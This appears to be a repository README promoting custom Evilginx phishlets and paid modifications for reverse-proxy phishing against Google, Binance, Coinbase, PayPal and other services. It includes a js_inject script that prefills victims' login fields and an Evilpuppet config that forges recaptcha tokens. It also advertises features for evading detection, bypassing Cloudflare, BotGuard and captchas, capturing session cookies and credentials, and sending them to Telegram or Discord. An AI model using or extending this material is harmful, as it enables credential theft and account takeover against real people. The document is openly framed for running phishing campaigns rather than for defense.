This repository was created solely to assist in the creation of PHISHLETS / Modification of the Evilginx software itself / In solving any problems associated with this software and PHISHLETS.
Preface: At the moment, there are a very large number of scammers who sell public, raw goods, people who do not understand at all how Reverse Proxy works. Watching these people on hacker sites, telegram channels and on the Internet in general becomes funny. There is nothing complicated in creating a template for EvilGinx; the entire manual is described by the founder himself kgretzky "Owner") [thanks to him for this creation] It is for this reason that we decided to make a small laboratory for mutual assistance in this matter.
Learn how to install Evilginx locally or deploy it on a remote server Deployment / Learn how to set up Evilginx and run your first phishing campaign Quick Start / Learn how to use Evilginx Guides [ CONFIG X PHISHLETS X LURES X REDIRECTORS X SESSIONS X PROXY X BLACKLIST ]
[ Google x Binance x Blockchain x Coinbase x Bitmedia x PayPal x Telegram x Proton x Dropbox x Payeer ]
Phishlets are configuration files in YAML format. If you need to get familiar with YAML, first, you can find some good overview here: YAML Syntax Phishlet Format Create
This section defines all Javascript scripts that you want to inject into proxied pages. Every script can be customized with {var_name} variable parameters, which later can be set to different values in each created lure.
js_inject:
- trigger_domains: ["www.domain.com"]
trigger_paths: ["/uas/login"]
trigger_params: ["email"]
script: |
function lp(){
var email = document.querySelector("#username");
var password = document.querySelector("#password");
if (email != null && password != null) {
email.value = "{email}";
password.focus();
return;
}
setTimeout(function(){lp();}, 100);
}
setTimeout(function(){lp();}, 100);
This part applies only to Evilginx Pro users who have access to Evilpuppet module.
Interactive background browser sessions, spawned on-demand, with sole purpose of forging secret tokens to be used within the proxied Evilginx session.
evilpuppet:
triggers:
- domains: ['www.domain.com']
paths: ['/sessions']
token: 'recaptcha_token'
open_url: 'https://www.domain.com/signin'
actions:
- selector: '#email'
value: '{username}'
enter: false
click: false
post_wait: 0
- selector: '#password'
value: '{password}'
enter: false
click: false
post_wait: 0
- selector: '#stay_signed_in'
click: true
post_wait: 0
- selector: '#signin_button'
click: true
post_wait: 0
interceptors:
- token: 'recaptcha_token'
url_re: '/sessions'
post_re: 'recaptcha_token=([^&]*)'
abort: true
#5 Puppeteer integration with Evilginx
Evilginx X Puppeteer https://github.com/Evi1Grey5/Evilginx-3-PHISHLET-LAB/issues/13
We also added Puppeteer to Evilginx and added some modifications to the http_proxy.go and phishlet.go. It turned out to be a juicy mod.
We decided to make a good mod for Evilginx. By adding Evil Puppet to it / Sending notifications via Discord / Module for generating PHISHLETs, collecting configurations via Burp Suite [ Functionality:
- Template Generation: The module can create various violet templates that mimic legitimate websites.
- Content Customization: The user can customize text, images, and other elements to make the phishlet more believable.
- Integration with Burp Suite: The module can be integrated into Burp Suite to facilitate the testing and vulnerability analysis process.
- Automation: Allows you to quickly create many phishlets for different scenarios.]
-
Telegram / Discord WebHook.
-
Identifier obfuscation to prevent websites from detecting evilginx.
-
Fixed: Cookie grab failure when cookies have protection symbols. (Problem was that some of the symbols used in cookies are not supported by the original evilginx and it can't detect the set-cookie event. )
-
Fixed: Stability issues with original evilginx. Open doors to handle unlimited number of users at the same time.
-
Fully obfuscated hardcoded http_proxy.go file that is not readable to prevent fast red-flag on domains.
-
Capture and proxying captcha / re / h /v2,v3.
-
Cloudflare: Required if site has Cloudflare Anti-DDoS page enabled.
-
BotGuard: Required for sites like Google (verified, trusted accounts), Microsoft o365 (some of) 3rd parties login pages usually big companies or extra protection without it lets say only 70% accounts would work etc etc.
-
hCaptcha, recaptcha - Required for sites that have hCaptcha, recaptcha on forms or as Anti-Ddos.
-
GeeTest: Needed for crypto websites like Binance, Coinbase, Blockchain etc etc
-
Custom JS: Required for sites that have their own protection for certain actions.
- You will be able to monitor and analyze HTTP requests and WebSocket messages that pass through your Evilginx server. This can help in understanding user behavior and identifying potential vulnerabilities.
- Data collection. Intercepting requests may allow you to collect information about users, such as credentials, access tokens, and other sensitive information, if you use Evilginx for phishing.
- Debugging. If you are developing or testing your Evilginx templates, JavaScript code integration can help you debug and identify functionality issues by showing what data is being sent and received.
- Adaptation and modification: By using request interception, you can adapt the behavior of your Evilginx server depending on the data received, for example, change messages or redirects based on the contents of requests. Low-level network interception library
Questions about installing/receiving the update #16
Also, all additional information is listed in the "issues" section. Read, ask your questions, share your knowledge in the Discussion section. Whenever possible, we will post new PHISHLETS / Information about tool customization. You also need to participate in order to develop this project.
Evilginx 3 [PHISHLET] by Evi1Grey5 [CUSTOM CREATION / FREE / DEVELOPMENT]
Contacts: injectexp.dev / pro.injectexp.dev / Telegram: @Evi1Grey5 [support] Tox: 340EF1DCEEC5B395B9B45963F945C00238ADDEAC87C117F64F46206911474C61981D96420B72